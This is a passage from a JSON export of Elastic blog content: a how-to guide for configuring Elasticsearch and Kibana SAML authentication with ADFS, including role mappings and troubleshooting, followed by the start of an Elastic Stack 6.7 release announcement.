11pt;'\u003e\u0026nbsp;\u0026nbsp;saml.saml1:\u003c/span\u003e \u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;order: 0\u003c/span\u003e \u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;realm: saml-adfs\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;description: \"Log in with my SAML ADFS\"\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;basic.basic1:\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;order: 1\u003c/span\u003e\u003c/pre\u003e\u003ch3\u003e\u003cstrong\u003eGenerate metadata file for use with ADFS\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003ePlease note that this step is optional and not available for deployments running in Elasticsearch Service.\u003c/p\u003e\u003cp\u003eElasticsearch includes a tool that generates a metadata file based on the configuration specified in the yml configuration file. It will output a metadata.xml file that can be imported into ADFS and will simplify configuration of IDP. Detailed instructions for running elasticsearch-saml-metadata are described on \u003ca href=\"/guide/en/elasticsearch/reference/current/saml-metadata.html\"\u003ethis documentation page\u003c/a\u003e. For this example we used the following syntax and enter required information about the contact details:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ebin/elasticsearch-saml-metadata --realm saml-adfs \\ \u003cbr /\u003e --service-name kibana-access \\ \u003cbr /\u003e --locale en-GB \\ \u003cbr /\u003e --contacts \\ \u003cbr /\u003e --organisation-name \"SAML LAB\" \\ \u003cbr /\u003e --organisation-url \"\u0026lt;a href=\"http://saml.lab/demo/\"\u0026gt;http://saml.lab/demo/\u0026lt;/a\u0026gt;\"\u003cbr /\u003e\u003c/pre\u003e\u003ch3\u003e\u003cstrong\u003eConfiguring ADFS IdP:\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003eTo prepare ADFS to act as an IdP for Elasticsearch SAML, you need to complete two parts of configuration. In first part you will configure Relying Party Trust, where you configure ADFS to trust our Elasticsearch cluster. This can be done manually or by using the metadata created with the elasticsearch-saml-metadata tool. In the second part you will configure the type of claims (attributes) that ADFS will forward to Elasticsearch.\u003c/p\u003e\u003ch4\u003e\u003cstrong\u003eStep 1a: Configure the ADFS Relying Party Trust manually:\u003c/strong\u003e\u003c/h4\u003e\u003col\u003e\u003cli\u003eIn Server Manager click tools and open AD FS Management.\u003c/li\u003e\u003cli\u003eExpand Trust Relationships, right-click on Relying Party Trust, and select Add Relying Party Trust.\u003c/li\u003e\u003cli\u003eIn the wizard, select Claims aware and click Start.\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc565f05e24467c21/5dc08113a85dd3382954ef80/saml-adfs-add-relying-2-blog.jpg\" data-sys-asset-uid=\"bltc565f05e24467c21\" alt=\"Wizard welcome screen\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"4\"\u003e\u003cli\u003eSelect “Enter data about the relying party manually” and click Next.\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2a44d736696c7e2a/5dc081da16de0d360b25e453/saml-adfs-select-data-3-blog.jpg\" data-sys-asset-uid=\"blt2a44d736696c7e2a\" alt=\"Enter data manually option\" style=\"display: block;margin: auto;\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"5\"\u003e\u003cli\u003eEnter the display name for the claims provider.\u003cp\u003e\u003c/p\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt260a76f38f988a05/675a0488ea6bc6ab7818647f/update-1.png\" alt=\"update-1.png\" height=\"auto\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"6\"\u003e\u003cli\u003eOn the Configure Certificate page, skip configuration and click Next.\u003c/li\u003e\u003cli\u003eOn the Configure URL page of wizard, enable support for SAML 2.0 Web SSO protocol and enter the SSO service URL. This is the same value you added above in the \u003cspan data-type='inlineCode'\u003esp.acs\u003c/span\u003e parameter of Elasticsearch SAML realm configuration: \u003cspan data-type='inlineCode'\u003ehttps://kibana.example.com/api/security/saml/callback\u003c/span\u003e\u003cp\u003e\u003c/p\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt91fe7bd0eee8ef16/675b074830b280222adf40b5/update-2.png\" alt=\"update-2.png\" height=\"auto\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"8\"\u003e\u003cli\u003eOn the Configure Identifiers step, add the Relying Party Trust identifier, which will be the same string as configured for \u003cspan data-type='inlineCode'\u003esp.entity_id\u003c/span\u003e in the Elasticsearch SAML realm configuration — in this case that is \u003cspan data-type='inlineCode'\u003ehttps://kibana.example.com/\u003c/span\u003e.\u003cp\u003e\u003c/p\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt04f962b9501538b8/675b07b5a98d6578accd050d/update-3.png\" alt=\"update-3.png\" height=\"auto\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"9\"\u003e\u003cli\u003eOn the next three steps you select defaults, or configure which users can use this Relying Party Trust. Detailed configuration is out of scope for this blog.\u003c/li\u003e\u003c/ol\u003e\u003ch4\u003e\u003cstrong\u003eStep 1b: Configure the ADFS Relying Party Trust by using metadata:\u003c/strong\u003e\u003c/h4\u003e\u003col\u003e\u003cli\u003eIn ADFS management expand Trust Relationships, right-click Relying Party Trust and select Add Relying Party Trust.\u003c/li\u003e\u003cli\u003eIn the wizard, select Claims aware and click Start.\u003c/li\u003e\u003cli\u003eSelect the metadata file created and follow the wizard:\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt72f3061e9b1519c3/5dc0833d168dd039dfa5c533/saml-adfs-config-with-metadata-7-blog.gif\" data-sys-asset-uid=\"blt72f3061e9b1519c3\" alt=\"saml-adfs-config-with-metadata-7-blog.gif\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003ch4\u003e\u003cstrong\u003eStep 2: Configure ADFS claims:\u003c/strong\u003e\u003c/h4\u003e\u003cp\u003eIn the second part you will configure what attributes ADFS will send to Elasticsearch as part of SAML authentication process. For the purposes of this blog post, we will configure ADFS to release both an attribute user principal name (UPN) and a NameID. Both of these can be mapped to attributes.principal in the Elasticsearch configuration, so you can select to configure either one of them. You will also configure a claim for Group membership so that you can then map the values in Elasticsearch using attributes.groups.\u003c/p\u003e\u003col\u003e\u003cli\u003eIn the Relying Party Trusts (RPT) frame, right-click the newly created Elasticsearch 7.4.0 RPT and select Edit Claim Issuance Policy.\u003c/li\u003e\u003cli\u003eSelect Add Rule to open Add Rule wizard.\u003c/li\u003e\u003cli\u003eSelect Send LDAP Attributes as Claims and click Next.\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4ade089a94ae1c9f/5dc08404f9248a391f9281c4/saml-adfs-select-rule-template-10-blog.jpg\" data-sys-asset-uid=\"blt4ade089a94ae1c9f\" alt=\"Select the rule template\" style=\"display: block;margin: auto;\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"4\"\u003e\u003cli\u003eEnter a new name for the Claim rule, select Active Directory as the Attribute store, and create a new mapping of LDAP attributes to outgoing claim types. Based on our current configuration, you are mapping User-Principal-Name to UPN (type \u003cstrong\u003eUPN\u003c/strong\u003e if it doesn't exist) and Token-Groups - Unqualified names -\u0026nbsp;Group. Click Finish.\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltac88a4cd4f10826d/5dc083d5168dd039dfa5c545/saml-adfs-config-rule-9-blog.jpg\" data-sys-asset-uid=\"bltac88a4cd4f10826d\" alt=\"Configure rules\" style=\"display: block;margin: auto;\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"5\"\u003e\u003cli\u003eIf attributes.principal: “nameid:persistent” was configured, you need to add an additional claim rule to transform the UPN attribute to persistent NameID. As before, click the Add Rule to open the wizard, but this time select “Transform an incoming claim” template.\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf1ed750d792e76d2/5dc083984290423395c9f3cd/saml-adfs-select-rule-8-blog.jpg\" data-sys-asset-uid=\"bltf1ed750d792e76d2\" alt=\"Select rule template\" style=\"display: block;margin: auto;\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"6\"\u003e\u003cli\u003eIn the next step you configure the transformation of the UPN attribute to Persistent Nameid as per this screenshot and save the newly created rule.\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltade1be81b1a192b6/5dc0843bf9248a391f9281ca/saml-adfs-edit-rule-11-blog.jpg\" data-sys-asset-uid=\"bltade1be81b1a192b6\" alt=\"Edit rule name ID\" style=\"display: block;margin: auto;\"/\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003eNote, that you don’t necessarily have to use UPN as the incoming claim type, but can select another value if it better suits the configuration.\u003c/p\u003e\u003cp\u003eThis concludes configuration of ADFS.\u003c/p\u003e\u003ch3\u003e\u003cstrong\u003eConfiguring SAML role mappings\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003eWhen you configured Kibana setting for SAML authentication, you enabled the saml authentication provider, as well as the basic authentication provider by configuring xpack.security.authc.providers: [saml, basic]. This enables us to log in into Kibana even if SAML authentication is currently not working. With both saml and basic provider enabled, you need to navigate to \u0026lt;kibana_url\u0026gt;/login in order to log in to Kibana with local user credentials. For this blog post, you will log in with local elastic user and use Kibana Dev Tools to create role mappings in Elasticsearch, based on the membership of our SAML users in Active Directory groups. The Elasticsearch REST API can be used instead of Kibana Dev Tools as described on \u003ca href=\"/guide/en/elasticsearch/reference/current/security-api-put-role-mapping.html\"\u003ethis Elasticsearch documentation page\u003c/a\u003e. Our ad_kibana_users_group AD group will map to the kibana_user role in Elasticsearch and the ad_superusers_group AD group will map to the superuser role in Elasticsearch.\u003c/p\u003e\u003cp\u003eSuperuser mapping:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePOST /_security/role_mapping/saml-superuser \u003cbr /\u003e{ \u003cbr /\u003e \"enabled\" : true, \u003cbr /\u003e \"roles\" : [ \u003cbr /\u003e \"superuser\" \u003cbr /\u003e ], \u003cbr /\u003e \"rules\" : { \u003cbr /\u003e \"all\" : [ \u003cbr /\u003e { \u003cbr /\u003e \"field\" : { \u003cbr /\u003e \"realm.name\" : \"saml-adfs\" \u003cbr /\u003e } \u003cbr /\u003e }, \u003cbr /\u003e { \u003cbr /\u003e \"field\" : { \u003cbr /\u003e \"groups\" : \"ad_superusers_group\" \u003cbr /\u003e } \u003cbr /\u003e } \u003cbr /\u003e ] \u003cbr /\u003e }, \u003cbr /\u003e \"metadata\" : { } \u003cbr /\u003e }\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eKibana_user mapping:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePOST /_security/role_mapping/saml-kibana \u003cbr /\u003e{ \u003cbr /\u003e \"enabled\" : true, \u003cbr /\u003e \"roles\" : [ \u003cbr /\u003e \"kibana_user\" \u003cbr /\u003e ], \u003cbr /\u003e \"rules\" : { \u003cbr /\u003e \"all\" : [ \u003cbr /\u003e { \u003cbr /\u003e \"field\" : { \u003cbr /\u003e \"realm.name\" : \"saml-adfs\" \u003cbr /\u003e } \u003cbr /\u003e }, \u003cbr /\u003e { \u003cbr /\u003e \"field\" : { \u003cbr /\u003e \"groups\" : \"ad_kibana_users_group\" \u003cbr /\u003e } \u003cbr /\u003e } \u003cbr /\u003e ] \u003cbr /\u003e }, \u003cbr /\u003e \"metadata\" : { } \u003cbr /\u003e }\u003cbr /\u003e\u003c/pre\u003e\u003ch3\u003e\u003cstrong\u003eLog in with SAML and enjoy\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003eIf all is correct, you should now be able to log in into Kibana with SAML. After navigating to \u003ca href=\"https://kibana.saml.lab:5601\"\u003ehttps://kibana.saml.lab:5601\u003c/a\u003e you are redirected to the ADFS login page that looks like the screenshot below — without the awesome ELK B :) — and after entering credentials you will be logged into Kibana.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8557413fdd4518f7/5dc0846aec08dd3a777183e2/saml-adfs-login-12-blog.gif\" data-sys-asset-uid=\"blt8557413fdd4518f7\" alt=\"Log in to Kibana with SAML\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003ch3\u003e\u003cstrong\u003eIn case of issues\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003eSAML authentication has many different components, so a good troubleshooting plan enables us to resolve issues quickly. As a first step, you should review Elasticsearch and ADFS logs. Elasticsearch log location will be based on your Elasticsearch configuration, and ADFS logs are located in the Event Viewer under Application and Services logs:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0f3bd6fd3401f596/5dc084c5b5f194339a9b7fd8/saml-adfs-event-viewer-13-blog.jpg\" data-sys-asset-uid=\"blt0f3bd6fd3401f596\" alt=\"Checking ADFS logs in the Event Viewer\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eConfiguration issues should produce logs describing the issue. If you don’t see any issues in ADFS or Elasticsearch logs, we have a great documentation page that describes \u003ca href=\"/guide/en/elasticsearch/reference/7.4/trb-security-saml.html\"\u003ecommon SAML issues\u003c/a\u003e, and you can use it as a reference to see if your issue matches any of the common issues. If you still don’t find anything that matches the issue, you can increase the logging level for SAML events in Elasticsearch, and review the trace logs. To increase the level of SAML logs, you need to configure the following cluster setting:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePUT /_cluster/settings \u003cbr /\u003e{ \u003cbr /\u003e \"transient\": { \u003cbr /\u003e \"logger.org.elasticsearch.xpack.security.authc.saml\": \"trace\" \u003cbr /\u003e } \u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003ePlease note that this will provide a large number of logs, which can lead to disk space problems on Elasticsearch nodes, so once a couple of SAML events are captured, logging should be reverted back to normal.\u003c/p\u003e","category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-11-04T20:00:09.530Z","created_by":"bltea6cbb86fea188be","disclaimer":[],"full_bleed_image":{"uid":"bltf74b7eeea47be8ba","created_by":"bltea6cbb86fea188be","updated_by":"bltea6cbb86fea188be","created_at":"2019-11-06T14:42:25.715Z","updated_at":"2019-11-06T14:42:25.715Z","content_type":"image/jpeg","file_size":"94192","filename":"saml-adfs-blog-banner.jpg","title":"saml-adfs-blog-banner.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-11-06T19:02:29.948Z","user":"bltea6cbb86fea188be"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf74b7eeea47be8ba/5dc2dbd1d917b602d49108d8/saml-adfs-blog-banner.jpg"},"markdown_l10n":"","publish_date":"2019-11-06T19:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"In environments where you’re using Microsoft Active Directory Federation Services (ADFS) as an identity provider (IdP) for an Elasticsearch SAML realm, learn more about how to configure Elasticsearch SAML authentication.","canonical_tag":"","noindex":false},"tags":["saml","adfs","authentication"],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt78f5187a04b37389","created_by":"bltea6cbb86fea188be","updated_by":"bltea6cbb86fea188be","created_at":"2019-11-06T14:42:14.364Z","updated_at":"2019-11-06T14:42:14.364Z","content_type":"image/jpeg","file_size":"57821","filename":"saml-adfs-blog-thumb.jpg","title":"saml-adfs-blog-thumb.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-11-06T19:02:29.948Z","user":"bltea6cbb86fea188be"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt78f5187a04b37389/5dc2dbc61bfdeb01f7b41dd4/saml-adfs-blog-thumb.jpg"},"title":"How to configure Elasticsearch SAML authentication with ADFS","title_l10n":"How to configure Elasticsearch SAML authentication with ADFS","updated_at":"2024-12-12T18:43:41.740Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/how-to-configure-elasticsearch-saml-authentication-with-adfs","publish_details":{"time":"2024-12-12T18:43:49.908Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltae045d381bc97f0d","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blta88061c105b8011d","bltf81f1d17065a3a4d"],"body_l10n":"\u003cp\u003eVersion 6.7 of the Elastic Stack is here, and oh what a release it is. We're not sure if Christmas came early, late, or if all our Christmases came at once!\u003c/p\u003e\n \u003cp\u003eIn this announcement blog, we cover some of the release highlights. Be sure to dig into the individual announcement posts to dig into all the details. Or even better take the new version for a spin. Version 6.7 is available on our \u003ca href=\"/cloud/elasticsearch-service\"\u003eElasticsearch Service\u003c/a\u003e - the only hosted Elasticsearch offering to offer these new features. Or you can \u003ca href=\"/downloads\"\u003edownload the stack\u003c/a\u003e for a self-managed experience in your preferred deployment environment.\u003c/p\u003e\n \u003ch3\u003eElastic Maps: Expanding Mapping Capability for Geo Data in Kibana\u003c/h3\u003e\n \u003cp\u003eGeo is an important part of search, and this location-based data powers use cases from ranking neighborhood restaurants, to understanding where the latest marketing campaign has the biggest impact, to hunting down network threats around the globe. Over the years, we have invested heavily in improving our geo capabilities across the stack -- from better storage efficiency and dramatic improvements to query performance in Elasticsearch, to providing more geospatial visualization options in Kibana, to freely hosting basemap and country/region borders with the Elastic Maps Service.\u003c/p\u003e\n \u003cp\u003eKeeping in line with this evolution, we are excited to introduce Elastic Maps, a new dedicated solution for mapping, querying, and visualizing geospatial data in Kibana. Elastic Maps greatly expands on existing geospatial visualization options in Kibana with the introduction of features like:\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003eVisualizing multiple layers and data sources in the same map\u003c/li\u003e\n \u003cli\u003eDynamic data-driven styling on vector layers on maps\u003c/li\u003e\n \u003cli\u003eMapping both aggregate and document-level data\u003c/li\u003e\n \u003cli\u003eVisibility control of individual layers (based on zoom level) to control visual clutter\u003c/li\u003e\n \u003c/ul\u003e\n \u003cp\u003eAnd like everything else in Kibana, Elastic Maps embeds the query bar with autocomplete for the real-time ad hoc search \u0026amp; query experience that you have come to expect with the Elastic Stack.\u003c/p\u003e\n \u003cp\u003e\u003cimg asset_uid=\"bltcfa8e336725e2ec4\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcfa8e336725e2ec4/5c99ef3898d5092a05466c63/gif-maps-stack-pr-med-fidelity.gif\" alt=\"gif-maps-stack-pr-med-fidelity.gif\" height=\"auto\" /\u003e\u003c/p\u003e\n \u003cp\u003eMap all the details in this \u003ca href=\"/blog/elastic-maps-beta-released\"\u003edetailed Elastic Maps announcement blog\u003c/a\u003e.\u003c/p\u003e\n \u003ch3\u003eElastic Uptime: Actively Monitor Uptime of Services \u0026amp; Application\u003c/h3\u003e\n \u003cp\u003eIn the last few releases, we have introduced several new features, like autodiscovery for Kubernetes, and the Infrastructure and Logs solutions, to help Elastic users with infrastructure monitoring and observability use cases streamline their operations. We are excited to build on those recent efforts and introduce a new solution, Elastic Uptime, that makes it easy to detect when application services are down or responding slowly, and proactively notifies users about problems even before those services are called by the application.\u003c/p\u003e\n \u003cp\u003eElastic Uptime is based on Heartbeat, a lightweight data shipper for uptime monitoring, that can be deployed both inside and outside an organization's network. All it needs is network access to the desired HTTP, TCP, or ICMP endpoint being monitored. Use cases for Uptime solution include: host availability, service monitoring, website monitoring, and API monitoring.\u003c/p\u003e\n \u003cp\u003eBringing uptime data alongside logs, metrics, and tracing data in Elasticsearch, means that users can more efficiently track and manage all their data in a single operational store.\u003c/p\u003e\n \u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3c129cd22cc557ac/672d627f069a861207817875/animated-gif-kibana-dashboard-canvas.gif\" alt=\"animated-gif-kibana-dashboard-canvas.gif\" height=\"auto\" /\u003e\u003c/p\u003e\n \u003cp\u003eGet all the details on the new Uptime solution in this \u003ca href=\"/blog/elastic-uptime-monitoring-solution-released\"\u003edetail post\u003c/a\u003e.\u003c/p\u003e\n \u003ch2\u003eElasticsearch\u003c/h2\u003e\n \u003cp\u003e6.7 is a big release for Elasticsearch. In addition to launching several new features, \u003cstrong\u003ewe are excited to graduate several key Elasticsearch features to General Availability (GA) status and marking them production ready.\u003c/strong\u003e\u003c/p\u003e\n \u003cp\u003eAs the Elasticsearch post mentions, if it is an Elasticsearch feature with a 3-letter acronym, odds are it's now GA in 6.7.\u003c/p\u003e\n \u003ch3\u003eCross Cluster Replication (CCR) is GA\u003c/h3\u003e\n \u003cp\u003eCross Cluster Replication (CCR), which was introduced as a beta feature in version 6.5, was one of the most heavily requested features for Elasticsearch. CCR has a variety of use cases, including cross-datacenter and cross-region replication, replicating data to get it closer to the application server and user, and maintaining a centralized reporting cluster replicated from a large number of smaller clusters.\u003c/p\u003e\n \u003cp\u003eIn addition to maturing this feature to GA status, version 6.7 introduces several usability and UI improvements to CCR. Check out the details in the \u003ca href=\"/blog/elasticsearch-6-7-0-released\"\u003eElasticsearch release post\u003c/a\u003e.\u003c/p\u003e\n \u003ch3\u003eIndex Lifecycle Management (ILM) is GA\u003c/h3\u003e\n \u003cp\u003eIndex lifecycle management (ILM), which was released as a beta feature in Elasticsearch 6.6, is now generally available and ready for production use.\u003c/p\u003e\n \u003cp\u003eHandling how Elasticsearch indices are stored and configured as they age is a critical administrative task to optimize cluster performance and cost. ILM helps Elasticsearch admins define and automate those lifecycle management policies, i.e, how data is to be managed and moved between hot, warm, cold, and deletion phases as it ages.\u003c/p\u003e\n \u003cp\u003eIn addition to graduating index lifecycle management to GA status, version 6.7 also adds new capabilities to this feature. Most notably, users can now add \"freeze index\" action in the cold phase, significantly reducing the heap needed to store the index. Read about this and other ILM enhancements in the \u003ca href=\"/blog/elasticsearch-6-7-0-released\"\u003eElasticsearch 6.7 detail post\u003c/a\u003e.\u003c/p\u003e\n \u003ch3\u003eElasticsearch SQL (including JDBC \u0026amp; ODBC Clients) is GA\u003c/h3\u003e\n \u003cp\u003e\u003ca href=\"/products/stack/elasticsearch-sql\"\u003eElasticsearch SQL\u003c/a\u003e, which was introduced in version 6.3, introduced a way for users to interact and query their Elasticsearch data using a very familiar syntax: SQL. The addition of this feature opened up the full-text power of Elasticsearch to many more users. In addition to the SQL query syntax, Elasticsearch SQL functionality also includes the JDBC and ODBC clients, which allows 3rd party tools that support these drivers to connect to Elasticsearch as a backend datastore.\u003c/p\u003e\n \u003cp\u003eWe are excited to graduate all these features to GA status. Get all the details in the \u003ca href=\"/blog/elasticsearch-6-7-0-released\"\u003eElasticsearch post\u003c/a\u003e.\u003c/p\u003e\n \u003cp\u003eWe are barely skimming the surface of Elasticsearch 6.7 here. There's much more goodness in Elasticsearch 6.7. You can get all the details in the \u003ca href=\"/blog/elasticsearch-6-7-0-released\"\u003eElasticsearch release post\u003c/a\u003e.\u003c/p\u003e\n \u003ch2\u003eKibana\u003c/h2\u003e\n \u003ch3\u003eCanvas is GA\u003c/h3\u003e\n \u003cp\u003e\u003ca href=\"/products/stack/canvas\"\u003eCanvas\u003c/a\u003e, introduced as a beta feature in version 6.5, lets users showcase and present live data from Elasticsearch with pixel-perfect precision. We are excited to mark Canvas GA in version 6.7. Canvas elevates the visual storytelling in Kibana to new heights, opening up your data analysis and insights to broader audiences. It includes full support for Elasticsearch SQL, and just like the JDBC and ODBC clients, it lets Elasticsearch users expand the reach and impact of their data to broader business audiences.\u003c/p\u003e\n \u003ch3\u003eIntroducing Kibana Localization; first up Simplified Chinese\u003c/h3\u003e\n \u003cp\u003eIn version 6.7, Kibana introduces its first localization, and is now available in Simplified Chinese. This marks the beginning of a broader Kibana localization effort. In addition to the launch of Simplified Chinese interface, Kibana 6.7 also introduces a new localization framework to provide support for additional languages in the future. This localization framework also gives Elastic community members access to the necessary tooling to add their own custom translations.\u003c/p\u003e\n \u003cp\u003eGet details about all Canvas GA, localized Kibana, and other Kibana 6.7 features in the \u003ca href=\"/blog/kibana-6-7-0-released\"\u003edetailed Kibana 6.7 announcement post\u003c/a\u003e.\u003c/p\u003e\n \u003ch2\u003eBeats\u003c/h2\u003e\n \u003ch3\u003eFunctionbeat is GA\u003c/h3\u003e\n \u003cp\u003eFunctionbeat is a new kind of Beat that deploys as a function in serverless computing frameworks, and streams cloud infrastructure logs and metrics into Elasticsearch. It was introduced as a beta in version 6.5, and is now graduated to GA status in version 6.7. Functionbeat currently supports the AWS Lambda framework, and can stream data from CloudWatch Logs, SQS, and Kinesis.\u003c/p\u003e\n \u003cp\u003eRead about Functionbeat and other Beats 6.7 updates in the \u003ca href=\"/blog/beats-6-7-0-released\"\u003eBeats release blog\u003c/a\u003e\u003c/p\u003e\n \u003ch3\u003eLogs \u0026amp; Infrastructure Solutions are now GA\u003c/h3\u003e\n \u003cp\u003e\u003ca href=\"/blog/elastic-infrastructure-app-released\"\u003eInfrastructure\u003c/a\u003e and \u003ca href=\"/blog/elastic-logs-app-released\"\u003eLogs\u003c/a\u003e solutions were both introduced as beta features in version 6.5. We are excited to graduate them to GA status.\u003c/p\u003e\n \u003cp\u003eThe \u003ca href=\"/solutions/logging\"\u003eLogs solution\u003c/a\u003e provides users with real-time log tailing in a compact, customizable display. It's similar to tailing a file, but with the ability to see the logs from all your infrastructure in a single streaming view. And with an embedded search bar powered by Elasticsearch, users can easily narrow the streaming view to just the logs they are looking for.\u003c/p\u003e\n \u003cp\u003eThe \u003ca 